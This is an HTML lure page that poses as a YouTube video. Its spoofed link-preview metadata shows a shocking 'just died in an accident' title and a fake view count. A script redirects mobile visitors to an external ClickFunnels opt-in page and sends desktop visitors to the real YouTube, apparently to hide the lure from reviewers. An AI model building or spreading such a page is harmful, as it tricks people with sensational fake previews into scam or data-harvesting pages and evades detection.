<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="facebook:card" content="summary_large_image">
<meta name="facebook:description" content="Youtube">
<meta name="facebook:app:country" content="US">
<meta property="og:image" content="https://media.discordapp.net/attachments/1118649980576600136/1124738574672216244/983985iufnjkry2347892352387562378523.png">
<meta property="og:title" content="𝐉𝐮𝐬𝐭 𝐝𝐢𝐞𝐝 𝐢𝐧 𝐚𝐧 𝐚𝐜𝐜𝐢𝐝𝐞𝐧𝐭">
<meta property="og:description" content="147.945 Views">
<meta property="og:site_name" content="YouTube" />
<meta property="fb:app_id" content="87741124305">  
</head>
<body>
<script type='text/javascript'>
//<![CDATA[
        var device = navigator.userAgent
        
        if (device.match(/Iphone/i)|| device.match(/Ipod/i)|| device.match(/Android/i)|| device.match(/J2ME/i)|| device.match(/BlackBerry/i)|| device.match(/iPhone|iPad|iPod/i)|| device.match(/Opera Mini/i)|| device.match(/IEMobile/i)|| device.match(/Mobile/i)|| device.match(/Windows Phone/i)|| device.match(/windows mobile/i)|| device.match(/windows ce/i)|| device.match(/webOS/i)|| device.match(/palm/i)|| device.match(/bada/i)|| device.match(/series60/i)|| device.match(/nokia/i)|| device.match(/symbian/i)|| device.match(/HTC/i))
        {
        window.location ="https://app.funnel-preview.com/for_domain/news2023.clickfunnels.com/optin1688228852099";
        }else
{
 window.location = "https://www.youtube.com";
}
//]]>
</script>
</body>
</html>
